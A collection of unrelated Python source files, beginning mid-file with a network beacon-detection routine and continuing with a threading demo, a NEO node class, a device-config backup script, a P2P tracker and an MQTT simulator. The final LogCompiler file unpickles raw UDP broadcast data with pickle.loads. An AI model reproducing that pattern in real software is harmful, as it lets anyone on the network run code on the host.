        :param html_out: optional path for HTML output
        :param json_out: optional path for line-delimited JSON output (appended)
        :return: the resulting DataFrame
        """
        for triad_id in self.high_freq:
            self.q_job.put(triad_id)
        # Manager list so worker processes can append results safely.
        mgr = Manager()
        beacon_list = mgr.list()
        processes = [Process(target=self.find_beacon, args=(self.q_job, beacon_list,)) for thread in
                     range(self.NUM_PROCESSES)]
        # Run processes
        for p in processes:
            p.start()
        # Exit the completed processes
        for p in processes:
            p.join()
        beacon_list = list(beacon_list)
        beacon_df = pd.DataFrame(beacon_list,
                                 columns=self.fields).dropna()
        beacon_df.interval = beacon_df.interval.astype(int)
        beacon_df['dest_degree'] = beacon_df.groupby(self.beacon_dest_ip)[self.beacon_dest_ip].transform('count').fillna(0).astype(int)
        self.vprint('{info} Calculating destination degree.'.format(info=self.info))
        if whois:
            self.vprint('{info} Enriching IP addresses with whois information'.format(info=self.info))
            beacon_df['src_whois'] = beacon_df[self.beacon_src_ip].apply(lambda ip: self.whois.get_name_by_ip(ip))
            beacon_df['dest_whois'] = beacon_df[self.beacon_dest_ip].apply(lambda ip: self.whois.get_name_by_ip(ip))
        if focus_outbound:
            # Keep only private -> public flows: source must be private, the
            # destination must not be multicast/reserved/private.
            self.vprint('{info} Applying outbound focus - filtering multicast, reserved, and private IP space'.format(info=self.info))
            beacon_df = beacon_df[(beacon_df[self.beacon_src_ip].apply(private_check)) &
                                  (~beacon_df[self.beacon_dest_ip].apply(multicast_check)) &
                                  (~beacon_df[self.beacon_dest_ip].apply(reserved_check)) &
                                  (~beacon_df[self.beacon_dest_ip].apply(private_check))]
        if group:
            self.vprint('{info} Grouping by destination group IP'.format(info=self.info))
            if whois:
                # NOTE(review): mutates self.fields, so repeated calls insert
                # 'dest_whois' again each time -- confirm intended.
                self.fields.insert(self.fields.index(self.beacon_dest_ip), 'dest_whois')
            # groupby().size() yields counts in column 0, which is then
            # dropped, leaving only the grouped index columns.
            beacon_df = pd.DataFrame(beacon_df.groupby(self.fields).size())
            beacon_df.drop(0, axis=1, inplace=True)
        if csv_out:
            self.vprint('{success} Writing csv to {csv_name}'.format(csv_name=csv_out, success=self.success))
            beacon_df.to_csv(csv_out, index=False)
        if html_out:
            self.vprint('{success} Writing html file to {html_out}'.format(html_out=html_out, success=self.success))
            beacon_df.to_html(html_out)
        if json_out:
            self.vprint('{success} Writing json file to {json_out}'.format(json_out=json_out, success=self.success))
            now = datetime.datetime.now().isoformat()
            beacon_df['timestamp'] = now
            beacon_df['period'] = self.period
            beacon_df['event_type'] = "beaconing"
            beacons = beacon_df.to_dict(orient="records")
            # Append (not overwrite) one JSON object per line.
            with open(json_out, 'a') as out_file:
                for beacon in beacons:
                    out_file.write(json.dumps(beacon) + '\n')
        return beacon_df
|
python_thread_lock.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
'线程锁'
__author__ = 'garyhu'
import threading,time,pdb;
balance = 0;
lock = threading.Lock();
def change_b(n):
    """Subtract then add *n* to the shared balance (net zero when atomic).

    The two statements are intentionally non-atomic so that, without a lock,
    concurrent callers can interleave and corrupt the global balance.
    """
    global balance
    # NOTE: removed the leftover pdb.set_trace() debug breakpoint -- it halted
    # every worker thread on entry, making the demo unrunnable non-interactively.
    balance = balance - n
    balance = balance + n
def run_task(n):
    """Apply change_b(n) 100 times, serialising access with the shared lock.

    Bug fixed: the original released with ``lock.release;()`` -- a bare
    attribute reference followed by an empty tuple -- so release() was never
    actually called and the second acquire() deadlocked.  The ``with``
    statement guarantees the lock is released even if change_b raises.
    """
    for _ in range(100):
        with lock:
            try:
                change_b(n)
            except BaseException:
                # Preserve the original best-effort behavior: report and continue.
                print("error")
if __name__ == '__main__':
    # Two workers hammer the shared balance concurrently with different deltas.
    workers = [
        threading.Thread(target=run_task, args=(10,)),
        threading.Thread(target=run_task, args=(21,)),
    ]
    print("开启子线程工作")
    # Launch both workers, then wait for each before reading the result.
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
print("balance %d " % balance); |
serving_file_test.py | import requests
import random
from multiprocessing import Process
def test():
    """Fetch one of two static assets at random; report any non-200 response."""
    url = (
        "http://localhost:8080/statics/js/bootstrap.bundle.min.js"
        if random.randint(0, 1) == 0
        else "http://localhost:8080/statics/css/bootstrap.min.css"
    )
    resp = requests.get(url)
    if resp.status_code != 200:
        print(resp)
if __name__ == '__main__':
    # Hit the static-file server with 200 concurrent one-shot clients.
    print('starting test')
    clients = [Process(target=test) for _ in range(200)]
    for client in clients:
        client.start()
    # Wait until every client has finished before declaring the run over.
    for client in clients:
        client.join()
    print('end of test')
|
main.py | import os
import threading
from time import sleep
from enum import Enum
from twisted.internet import reactor, task
from shutil import copyfile
from neo.Core.Blockchain import Blockchain
from neo.Network.NodeLeader import NodeLeader
from neo.Implementations.Blockchains.LevelDB.LevelDBBlockchain import LevelDBBlockchain
from neo.Settings import settings
from neo.Implementations.Wallets.peewee.UserWallet import UserWallet
from prompt_toolkit import prompt
from neo.Wallets.utils import to_aes_key
from logzero import setup_logger
from base58 import b58encode_check
from neocore.Fixed8 import Fixed8
from neo.Prompt.Commands.Invoke import InvokeContract, TestInvokeContract
class NetworkType(Enum):
    """The NEO network a node can target."""

    PRIVNET = 1  # local private network
    TESTNET = 2  # public test network
    MAINNET = 3  # production network
class BlockchainMain:
    """Base class wiring together a NEO node: chain DB, network layer and an
    optional wallet.  Subclasses override custom_background_code()/pre_start()."""

    logger = None            # logzero logger created in __init__
    network_type = None      # NetworkType enum value
    blockchain = None        # LevelDBBlockchain instance (created in run())
    wallet_path = None       # set by setup_wallet(); None means "no wallet"
    wallet = None            # opened UserWallet
    wallet_passwd_key = None # AES key derived from the prompted password

    def __init__(self, network_type, logger_name):
        """
        :param network_type: NetworkType member selecting main/test/priv net
        :param logger_name: name passed to logzero's setup_logger
        """
        self.network_type = network_type

        # If you want the log messages to also be saved in a logfile, enable the
        # next line. This configures a logfile with max 10 MB and 3 rotations:
        # settings.set_logfile("/tmp/logfile.log", max_bytes=1e7, backup_count=3)
        self.logger = setup_logger(logger_name)

    def run(self):
        """Start the node and block in the twisted reactor until shutdown."""
        settings.set_max_peers(150)

        # Setup the blockchain
        self.blockchain = LevelDBBlockchain(settings.chain_leveldb_path)
        Blockchain.RegisterBlockchain(self.blockchain)
        NodeLeader.Instance().Start()
        # Persist incoming blocks every 100 ms.
        dbloop = task.LoopingCall(Blockchain.Default().PersistBlocks)
        dbloop.start(.1)
        Blockchain.Default().PersistBlocks()

        # Disable smart contract events for external smart contracts
        settings.set_log_smart_contract_events(False)

        # if the wallet was set up (by setting a path and loading the password), then open it!
        if self.wallet_path:
            self.wallet_open()

        # Start a thread with custom code
        d = threading.Thread(target=self.custom_background_code)
        d.setDaemon(True)  # daemonizing the thread will kill it when the main thread is quit
        d.start()

        # invoke any pre-start action that needs to occur before we start the reactor.
        # optional for subclasses to implement.
        self.pre_start()

        # Run all the things (blocking call)
        self.logger.info("Everything setup and running. Waiting for events...")
        reactor.run()
        self.logger.info("Shutting down")
        if self.wallet_path:
            self.wallet_close()
        Blockchain.Default().Dispose()
        NodeLeader.Instance().Shutdown()
        self.logger.info("Shut down.")

    def pre_start(self):
        """Hook for subclasses: runs just before the reactor starts."""
        pass

    def custom_background_code(self):
        """ Custom code run in a background thread. Prints the current block height.

        This function is run in a daemonized thread, which means it can be instantly killed at any
        moment, whenever the main thread quits. If you need more safety, don't use a daemonized
        thread and handle exiting this thread in another way (eg. with signals and events).
        """
        while True:
            self.logger.info("Block %s / %s", str(Blockchain.Default().Height), str(Blockchain.Default().HeaderHeight))
            sleep(60)

    @staticmethod
    def get_address(raw_address):
        """Return the base58check NEO address for a raw script hash."""
        # bl: NEO uses the AddressVersion 23, so stick that on the front of the address before doing the b58check
        raw_address = b'\x17' + raw_address
        return b58encode_check(raw_address).decode('utf-8')

    def setup_wallet(self, wallet_path):
        """Record the wallet path, prompt for its password, and pick a network.

        :param wallet_path: path to an existing wallet file
        :raises ValueError: if the wallet file does not exist
        """
        if not os.path.exists(wallet_path):
            raise ValueError("Wallet file not found")

        self.wallet_path = wallet_path
        # Interactive password prompt; key is derived immediately so the
        # plaintext password is not kept around.
        wallet_passwd = prompt("[password]> ", is_password=True)
        self.wallet_passwd_key = to_aes_key(wallet_passwd)

        self.setup_network()

    def setup_network(self):
        """Apply the global settings for the configured network type."""
        if self.network_type == NetworkType.TESTNET:
            settings.setup_testnet()
        elif self.network_type == NetworkType.MAINNET:
            settings.setup_mainnet()
        elif self.network_type == NetworkType.PRIVNET:
            settings.setup_privnet()
        else:
            raise ValueError('Unknown wallet %s' % self.wallet_path)

    def wallet_open(self):
        """Open the wallet file with the previously derived password key."""
        self.wallet = UserWallet.Open(self.wallet_path, self.wallet_passwd_key)

        # bl: there is some side effect happening here that allows the wallet to be fully/properly initialized.
        # without this, there are errors when sending NEP5 tokens (same goes in prompt.py).
        # don't have time to investigate right now, so doing this as a hack to get things working properly
        self.wallet.ToJson()

        # _walletdb_loop = task.LoopingCall(wallet.ProcessBlocks)
        # _walletdb_loop.start(1)
        self.logger.info("Opened wallet at %s", self.wallet_path)

    def wallet_sync(self):
        """Process all blocks from genesis to bring the wallet up to date."""
        self.wallet.ProcessBlocks(0)

    def wallet_close(self):
        """Sync the wallet one last time, then close it."""
        # _walletdb_loop.stop()
        self.wallet_sync()
        self.wallet.Close()

    def recover_wallet(self):
        """Replace the live wallet file with its '.syncd' backup and reopen it.

        :raises EnvironmentError: if no '<wallet_path>.syncd' backup exists
        """
        self.logger.warn("recovering wallet...")

        syncd_file_path = self.wallet_path + ".syncd"
        # check if the syncd wallet exists, and raise an exception if it does not!
        if not os.path.exists(syncd_file_path):
            raise EnvironmentError("Could not find file %s" % syncd_file_path)

        self.wallet_close()
        os.remove(self.wallet_path)
        copyfile(syncd_file_path, self.wallet_path)
        self.wallet_open()
        self.wallet_sync()
        self.logger.warn("wallet recovered!")

    def wait_for_peers(self):
        """Block (polling once a second) until at least one peer is connected."""
        while len(NodeLeader.Instance().Peers) == 0:
            self.logger.debug('waiting for NodeLeader peers')
            sleep(1)

    def test_invoke(self, args, expected_result_count, test_only=False, from_addr=None):
        """Test-invoke a contract and, unless test_only, relay the real TX.

        :param args: contract invocation arguments (script hash + params)
        :param expected_result_count: value the first result is checked against
        :param test_only: when True, stop after the test invocation
        :param from_addr: optional source address for the transaction
        :return: InvokeContract result, True (test_only success) or False
        """
        if args and len(args) > 0:
            tx, fee, results, num_ops = TestInvokeContract(self.wallet, args, from_addr=from_addr)

            if tx is not None and results is not None:
                print(
                    "\n-------------------------------------------------------------------------------------------------------------------------------------")
                print("Test invoke successful")
                print("Total operations: %s" % num_ops)
                print("Results %s" % [str(item) for item in results])
                print("Invoke TX GAS cost: %s" % (tx.Gas.value / Fixed8.D))
                print("Invoke TX fee: %s" % (fee.value / Fixed8.D))
                print(
                    "-------------------------------------------------------------------------------------------------------------------------------------\n")

                # Mismatches are logged but do not abort the invocation.
                if results[0].GetBigInteger() != expected_result_count:
                    self.logger.error("Found invalid result! '%s' but expected '%s'" % (results[0], expected_result_count))

                if test_only:
                    return True

                # bl: tx can fail if there are no connected peers, so wait for one
                self.wait_for_peers()
                return InvokeContract(self.wallet, tx, fee, from_addr)
            else:
                print("Error testing contract invoke: %s" % args)
        else:
            print("Invalid args for test_invoke! %s" % args)

        return False

    def shutdown(self):
        """Stop the twisted reactor, unwinding the blocking run() call."""
        self.logger.info("Shutdown invoked")
        reactor.stop()
|
DeviceCfgBackup_v5.0.py | #encoding=utf-8
import paramiko,openpyxl,time,re,os,sys,threading
from threading import *
from netmiko import ConnectHandler
def gain_cfgIp():
    """Read device management IPs and names from DeviceIP.xlsx.

    Reads the 'ip' sheet starting at row 2 and stops at the first empty
    B-column cell.  Column B holds the address, column A the device name.

    :return: tuple ``(ip_list, name_list)`` (tuples cannot be reassigned)
    """
    workbook = openpyxl.load_workbook(sys.path[0] + r'/DeviceIP.xlsx')
    sheet = workbook['ip']
    addresses = []
    names = []
    row = 2
    while sheet["B" + str(row)].value is not None:
        raw_value = sheet["B" + str(row)].value
        # Keep only digits, dots, commas and slashes so stray characters in
        # the spreadsheet cannot corrupt the address string.
        addresses.append("".join(re.findall("[0-9,/.]", raw_value)))
        names.append(sheet["A" + str(row)].value)
        row += 1
    return addresses, names
def save_cfg(ip_value):
    """SSH into one device and persist its running configuration.

    Uses the module-level ``username``/``password`` credentials and the
    ``pool_sema`` semaphore to bound concurrent sessions.
    """
    # Connection profiles; change device_type to match the vendor
    # (H3C: hp_comware, Huawei: huawei).
    h3c = {
        'device_type': 'hp_comware',
        'ip': ip_value,
        'username': username,
        'password': password,
    }
    huawei = {
        'device_type': 'huawei',
        'ip': ip_value,
        'username': username,
        'password': password,
    }
    pool_sema.acquire()
    print(ip_value+':配置保存中....')
    try:
        #connect=ConnectHandler(**huawei)
        # Pick the profile matching the vendor: huawei for Huawei, h3c for H3C.
        connect = ConnectHandler(**h3c)
        # Answer the interactive save prompts; timing-based, not pattern-based.
        save_output = connect.send_command_timing('save\ny\n\ny\n')
        print(ip_value+':配置保存完成')
        connect.disconnect()
    except Exception as e:
        print(ip_value+':登陆失败!!!\n【error info】:', e)
    pool_sema.release()
def cfg_download(ip_value, name, for_i, backup_path):
    """Download one device's startup config over SFTP into *backup_path*.

    :param ip_value: device management IP
    :param name: list of device names (indexed by *for_i*)
    :param for_i: index of this device in *name*
    :param backup_path: local directory for the .cfg file
    """
    pool_sema.acquire()
    try:
        transport = paramiko.Transport((ip_value, 22))
        transport.connect(username=username, password=password)
        sftp = paramiko.SFTPClient.from_transport(transport)
        # sftp.put(r'C:\py\test.PAT', r'/ttest.log')  # example: upload instead
        # Save the remote config file as <device-name>_<ip>.cfg locally.
        local_target = backup_path + '/' + name[for_i] + "_" + ip_value + '.cfg'
        sftp.get(cfg_name, local_target)
        print('配置备份文件生成:'+name[for_i]+"_"+ip_value+'.cfg')
        transport.close()
    except Exception as e:
        print(name[for_i]+"_"+ip_value+':配置文件备份失败!!!\n【error info】:', e)
    pool_sema.release()
def main():
    """Save every device's running config, then download the config files."""
    # Pull the device inventory (IP list, name list).
    ip_pool = gain_cfgIp()
    print(type(ip_pool))
    # Phase 1: ask every device to save its current running configuration.
    for i in ip_pool[0]:
        t2 = Thread(target=save_cfg, args=(i,))
        t2.start()  # start the worker thread
    # Give the save commands time to finish before downloading.
    # NOTE(review): a fixed 60 s sleep is a race, not a synchronisation --
    # joining the save threads would be reliable.
    time.sleep(60)
    # Phase 2: download each device's configuration file over SFTP.
    for_i = 0
    for i in ip_pool[0]:
        if for_i == 0:
            # Create a backup folder named after the current timestamp.
            local_time = time.strftime('%Y.%m.%d_%H.%M', time.localtime(time.time()))
            try:
                os.mkdir(sys.path[0]+'/'+local_time)
            except Exception as e:
                print(e)
            backup_path = sys.path[0]+'/'+local_time
        # One download thread per device: (ip, names, index, target folder).
        t1 = Thread(target=cfg_download, args=((i, ip_pool[1], for_i, backup_path)))
        t1.start()  # start the worker thread
        for_i = for_i+1
# --- Script parameters ------------------------------------------------------
#DeviceType='hp_comware'  # vendor -- H3C: hp_comware, Huawei: huawei
#DeviceTables_path=sys.path[0]+r'/DeviceIP.xlsx'
max_connections = 100  # maximum number of concurrent worker threads
cfg_name = r'/startup.cfg'  # remote config file name (defaults: Huawei vrpcfg.zip, H3C startup.cfg)
username = 'user'  # SSH account used to log in to the devices
password = 'password'  # SSH password used to log in to the devices
# NOTE(review): hard-coded placeholder credentials -- move to a config file or
# environment variables before real use.
# --- End parameters ----------------------------------------------------------
pool_sema = threading.BoundedSemaphore(max_connections)  # caps concurrent sessions
if __name__ == "__main__":
    main()
|
tracker.py | #!/usr/bin/env python3
#CS456 Assignment #3 - Tracker
#Daiyang Wang
#20646168
#Parameters: None
from socket import *
from threading import Thread, Lock
import sys, string, random, signal, json, collections
from packet import packet
import time
TERMINATE = False
peer_dict = {}
file_dict = {}
mesgs = collections.OrderedDict()
# Function check_inputs(args):
# Parameters: 0
#Create_TCP:
#Returns a socket on the first random port available (> 1024)
def Create_Socket():
    """Return a TCP socket bound to an OS-assigned free port (> 1024)."""
    listener = socket(AF_INET, SOCK_STREAM)
    # Binding to port 0 asks the OS to pick any currently free port.
    listener.bind(('', 0))
    return listener
#tcpNegotiation():
#Waits for an initiation from the client on <n_socket> via the sending of a predefined request code, <42>.
#Once initialized, a socket is chosen at random for the transaction to be completed. This socket is sent back to the client.
#Returns: r_socket
def tcpInitiation(n_socket):
    """Accept peer connections forever, one handler thread per peer.

    Each accepted peer gets a sequential peer number (count).  The loop exits
    once at least one peer has connected and all peers have since disconnected
    (the handler threads empty peer_dict).
    """
    global peer_dict, file_dict
    # set max number to 30
    n_socket.listen(30)
    waiting = 1
    count = 0
    while waiting:
        # peer socket and addr
        connectionSocket, addr = n_socket.accept()
        # add into multi thread
        t = Thread(target=peerInit, args=(connectionSocket, addr, count, ))
        t.start()
        # Give the handler time to register the peer before testing peer_dict.
        time.sleep(5)
        count += 1
        # NOTE(review): count was just incremented, so `count != 0` is always
        # true here; the exit condition reduces to `not peer_dict`.
        if not peer_dict and count != 0:
            break
# init peer with assigning peer number and
# init peer with assigning peer number and
def peerInit(connectionSocket, addr, peerNum):
    """Handle one peer for its whole lifetime.

    Handshake: send the assigned peer number (type 1), receive the offered
    file name + chunk count, then the peer's server port.  Register the peer
    in peer_dict/file_dict, broadcast the updated tables, then block waiting
    for the peer's disconnect request (type 2, seq 0).
    """
    global peer_dict, file_dict
    # send back to assigned peer number
    # send peer num to peer
    peer_num_pk = packet.create_t_to_p(1, str(peerNum))
    data = packet.get_tcp_data(peer_num_pk)
    connectionSocket.send(data)
    # receive filename from peer
    filename_pk = packet.parse_p2p_data(connectionSocket.recv(1024))
    filename_data = filename_pk.data.split()
    filename = str(filename_data[0])
    # file trunk number
    file_trunk_num = str(filename_data[1])
    # time.sleep(1)
    # receive port number from peer
    port_pk = packet.parse_p2p_data(connectionSocket.recv(1024))
    port_num = int(port_pk.data)
    # replace the port to sever peer port: peers connect to each other on
    # this advertised server port, not the ephemeral one of this connection.
    ip_addrs = addr[0]
    server_addr = (ip_addrs, port_num)
    peer_dict[peerNum] = [connectionSocket, server_addr]
    # Append this peer to the list of holders of `filename`.
    peerNums = file_dict.get(filename, [])
    peerNums.append(peerNum)
    file_dict[filename] = peerNums
    print("PEER ", peerNum, "CONNECT: OFFERS 1")
    print(peerNum, " ", filename, " ", file_trunk_num)
    time.sleep(1)
    # once new peer connect, update list
    t = Thread(target=peersBrodcast, args=())
    t.start()
    # listen packet until peer exit
    while True:
        peer_pk = packet.parse_p2p_data(connectionSocket.recv(1024))
        if peer_pk.type == 2:
            if peer_pk.seq_num == 0:  # peer want to exit
                # print("here: removing peers") #TODO
                # Payload: "<peer_num> <file_name> <num_files_received>"
                peer_pk = peer_pk.data.split()
                peer_num = int(peer_pk[0])
                peer_file_name = peer_pk[1]
                num_files = peer_pk[2]
                print("PEER", peer_num, peer_file_name)
                # remove peer from peer dict
                peer_dict.pop(peer_num, None)
                print("PEER ", peer_num, " DISCONNECT: RECEIVED ", num_files)
                for file_name, v in file_dict.items():
                    print(peer_num, " ", file_name)
                if len(peer_dict) == 0:
                    # Last peer gone: allow it to exit and end this handler.
                    connectionSocket.send(packet.get_tcp_data(packet.create_t_to_p(0, "")))
                    return
                # NOTE(review): this overwrites the holder list for the file
                # with *all* remaining peers -- confirm intended.
                peerlist = list(peer_dict.keys())
                file_dict[peer_file_name] = peerlist
                # remove from file dict
                # NOTE(review): removes the str form of the peer number, while
                # peerlist above holds ints -- confirm the key types match.
                for k, v in file_dict.items():
                    try:
                        v.remove(str(peer_num))
                    except:
                        pass
                # allow peer to exit
                connectionSocket.send(packet.get_tcp_data(packet.create_t_to_p(0, "")))
                # update new list to all peers
                t1 = Thread(target=peersBrodcast, args=())
                t1.start()
                # peersBrodcast()
                return
# broadcast to peer
def peersBrodcast():
# convert dictionary to string ready to send to peers
peer_dict_str = DicToString(peer_dict)
file_dict_str = DicToString(file_dict)
for k,v in peer_dict.items():
# send peer dictionary: peer_num (ipaddr, portnum)
connectionSocket = v[0]
connectionSocket.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
peer_data = packet.get_tcp_data(packet.create_t_to_p(2, peer_dict_str))
connectionSocket.send(peer_data)
time.sleep(1)
# send file dictionary: file_name (peer1, peer2, etc.)
files_data = packet.get_tcp_data(packet.create_t_to_p(3, file_dict_str))
connectionSocket.send(files_data)
def DicToString(dic):
    """Flatten a tracker registry dict into its wire-format string.

    Integer keys are peer entries whose value is ``[socket, (ip, port)]``;
    they render as ``"<peer>: <ip> <port> ;"``.  Any other key is a file
    entry whose value is an iterable of peer ids, rendered as
    ``"<file>: <p1> <p2> ... ;"`` (note the double space before ``;``).

    Improvement: entries are collected in a list and joined once instead of
    repeated string concatenation (quadratic in the original).

    :param dic: peer registry or file registry
    :return: all entries concatenated into a single string
    """
    parts = []
    for key, values in dic.items():
        if isinstance(key, int):
            ip_addr, port_num = values[1]
            parts.append(str(key) + ": " + str(ip_addr) + " " + str(port_num) + " ;")
        else:
            entry = str(key) + ": "
            for item in values:
                entry += str(item) + " "
            parts.append(entry + " ;")
    return "".join(parts)
#Main
def main():
tcp_socket = Create_Socket()
# get the tcp
trackerHost, neg_port = tcp_socket.getsockname() # print TCP server port
# put port number into port.txt files
port_to_write = open("port.txt", 'w')
port_to_write.write(str(neg_port))
port_to_write.close()
# print("SERVER_PORT =", str(neg_port))
tcpInitiation(tcp_socket) #Wait for initiation
# Guard the entry point so importing tracker.py (e.g. from tests or tooling)
# does not immediately start the blocking accept loop.
if __name__ == "__main__":
    main()
|
Temperature.py | import paho.mqtt.client as mqtt
import threading
import random
import time
from tkinter import *
import datetime
##### Flags #####
TEMP_RISE = True
BROKER = "192.168.12.1"
TOPIC = 'internetofthings/sim/'
SUBTOPIC = 'temperature'
def show_values():
    """Read the slider value and publish a slowly rising temperature forever.

    NOTE(review): this loops forever on the Tk callback thread, so the GUI
    freezes once the button is pressed -- consider moving the loop to a
    worker thread.
    """
    input_temp = w2.get()
    while TRUE:  # TRUE is Tkinter's constant (== 1): loops forever
        while True:
            # NOTE(review): compares a bool to Tkinter's TRUE (1); it works,
            # but `if TEMP_RISE:` would be clearer.
            if TEMP_RISE == TRUE:
                input_temp = input_temp + random.uniform(0, 0.3)
            if input_temp < 200:
                break
            # NOTE(review): the temperature only ever rises, so once it hits
            # 200 this inner loop can never exit -- confirm the range check.
            print("Temp out of range, type again")
        # Publish asynchronously, rounded to one decimal place.
        thread1 = threading.Thread(target=publish, args=(client, TOPIC + SUBTOPIC, round(input_temp, 1)))
        thread1.start()
        time.sleep(4)  # roughly one reading every 4 seconds
def publish(client, topic, temperatur):
    """Send one temperature reading to *topic* via *client*, then log it."""
    client.publish(topic, temperatur)
    # NOTE: the log line uses the module-level TOPIC/SUBTOPIC, not *topic*.
    log_line = "published data in " + TOPIC + SUBTOPIC + " " + str(temperatur) + "°"
    print(log_line)
def on_message(client, userdata, msg):
    """MQTT callback: print the topic and raw payload of each message."""
    line = msg.topic + " " + str(msg.payload)
    print(line)
def on_closing():
    """Window-close handler: tear down the Tk main window."""
    master.destroy()
# --- MQTT client and Tk UI wiring -------------------------------------------
client = mqtt.Client()
client.on_message = on_message
# NOTE(review): no client.loop_start()/loop_forever() call is visible, so the
# network loop never runs and on_message will not be invoked -- confirm.
client.connect(BROKER, 1883, 60)
master = Tk()
# Slider for choosing the starting temperature (-50 .. 150).
w2 = Scale(master, from_=-50, to=150, length=600, orient=HORIZONTAL)
w2.pack()
# Button starts the publish loop in show_values (blocks the Tk event loop --
# see the note on show_values).
Button(master, text='Publish temperature', command=show_values).pack()
# NOTE(review): on_closing() is defined above but never registered via
# master.protocol("WM_DELETE_WINDOW", ...) -- confirm intended.
mainloop()
|
LogCompiler.py | #!/usr/bin/python
# Copyright (c) 2017, Autonomous Networks Research Group. All rights reserved.
# Developed by:
# Autonomous Networks Research Group (ANRG)
# University of Southern California
# http://anrg.usc.edu/
# Contributors:
# Vidhi Goel
# Jake Goodman
# Jessica Koe
# Jun Shin
# Davina Zahabian
# Pradipta Ghosh
# Bhaskar Krishnamachari
# Contacts:
# Pradipta Ghosh <pradiptg@usc.edu>
# Bhaskar Krishnamachari <bkrishna@usc.edu>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# with the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# - Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimers.
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimers in the
# documentation and/or other materials provided with the distribution.
# - Neither the names of Autonomous Networks Research Group, nor University of
# Southern California, nor the names of its contributors may be used to
# endorse or promote products derived from this Software without specific
# prior written permission.
# - A citation to the Autonomous Networks Research Group must be included in
# any publications benefiting from the use of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# CONTRIBUTORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS WITH
# THE SOFTWARE.
###### LogCompiler.py ######
# Author: Jake Goodman & Jess Koe #
######################
#socat STDIO UDP4-DATAGRAM:10.99.0.255:6666,bind=:6666,broadcast
#This sets you up to broadcast and receive messages on port 6666
import socket
from threading import Thread
from Location import Location
import time
import pickle
import CFGReader
import math
class LogCompiler(object):
    def __init__(self, receivePort):
        """Create the compiler, open the EEL scenario log, and seed positions.

        :param receivePort: UDP port to listen on for node location reports
        """
        self.__receivePort = receivePort
        self.receiveSocket = None   # created later by setupConnection()
        self.currTimeInterval = 0   # current scenario time step (seconds)
        self.nodes = {}             # node id -> last known location
        self.messageTracker = {}    # bookkeeping for received messages
        #self.logFile = open('/home/dev/401/emane-tutorial/scenario/scenario.eel', 'w', 1)
        # buffering=1 -> line buffered, so each log line is flushed at once.
        # NOTE(review): the relative path assumes a specific working
        # directory -- confirm where the process is launched from.
        self.logFile = open('../scenario/scenario.eel', 'w', 1)
        self.initLogFileFromCfg()
def initLogFileFromCfg(self):
done = False
index = 1
while done == False:
section = "R" + str(index)
robotDict = CFGReader.ReadConfig("swarm.cfg", section)
if not robotDict:
done = True
break
rID = robotDict['rid']
loc = Location(float(robotDict["x"]), float(robotDict["y"]), float(robotDict["z"]))
self.nodes[rID] = self.xyzToLatLong(loc.getX(), loc.getY(), loc.getZ())
index += 1
srcDict = CFGReader.ReadConfig("swarm.cfg", "src")
dstDict = CFGReader.ReadConfig("swarm.cfg", "dst")
if not srcDict:
sys.exit("No [src] found in swarm.cfg")
if not dstDict:
sys.exit("No [dst] found in swarm.cfg")
srcLoc = Location(float(srcDict["x"]), float(srcDict["y"]), float(srcDict["z"]))
dstLoc = Location(float(dstDict["x"]), float(dstDict["y"]), float(dstDict["z"]))
self.nodes[index] = self.xyzToLatLong(srcLoc.getX(), srcLoc.getY(), srcLoc.getZ())
self.nodes[index + 1] = self.xyzToLatLong(dstLoc.getX(), dstLoc.getY(), dstLoc.getZ())
for i in range(11):
self.currTimeInterval = i
for rID in sorted(self.nodes.iterkeys()):
nodeLoc = self.nodes[rID]
latLongLoc = self.xyzToLatLong(nodeLoc.getX(), nodeLoc.getY(), nodeLoc.getZ())
logLine = str(i) + '.0 nem:' + str(rID) + ' location gps ' + str(latLongLoc.getX()) + ',' + str(latLongLoc.getY())+ ',' +str(latLongLoc.getZ()) + '\n'
self.logFile.write(logLine)
self.currTimeInterval += 1
def start(self):
self.setupConnection()
output = Thread(target = self.outputNodeData)
output.start()
def setupConnection(self):
self.receiveSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.receiveSocket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
self.receiveSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.receiveSocket.bind(('', self.__receivePort))
connection = Thread(target = self.listen)
connection.start()
def listen(self):
messageCounter = 0;
#self.messageTracker['002'] =1;
while True:
socketData = self.receiveSocket.recv(10240)
data= pickle.loads(socketData)
data = data.strip()
nodeData = data.split(' ')
senderID = nodeData[0]
messageID = nodeData[1]
if ((nodeData[0] + nodeData[1]) in self.messageTracker):
randomLoc = None
#self.receiveSocket.sendto(nodeData[1] + ' ' + nodeData[2] + ' ' + nodeData[3] + ' ' + nodeData[4] + ' ' + nodeData[5] + ' pass it on', (MCAST_GRP, MCAST_PORT))
else:
newPickle = nodeData[0] + ' ' + nodeData[1] + ' ' + nodeData[2] + ' ' + nodeData[3] + ' ' + nodeData[4] + ' ' + nodeData[5] + ' LC: pass it on'
pickledData = pickle.dumps(newPickle)
self.receiveSocket.sendto(pickledData,('<broadcast>', 6789))
messageCounter +=1
self.updateTracker(nodeData[0]+ nodeData[1])
nodeNum = nodeData[2]
nodeLocation = self.xyzToLatLong(nodeData[3], nodeData[4], nodeData[5])#Location(nodeData[3], nodeData[4], nodeData[5])
self.nodes[nodeNum] = nodeLocation
#self.receiveSocket.sendto('1 1 1 1', (MCAST_GRP, MCAST_PORT))
#time.sleep(1)
#self.receiveSocket.sendto('1 2 1 1', (MCAST_GRP, MCAST_PORT))
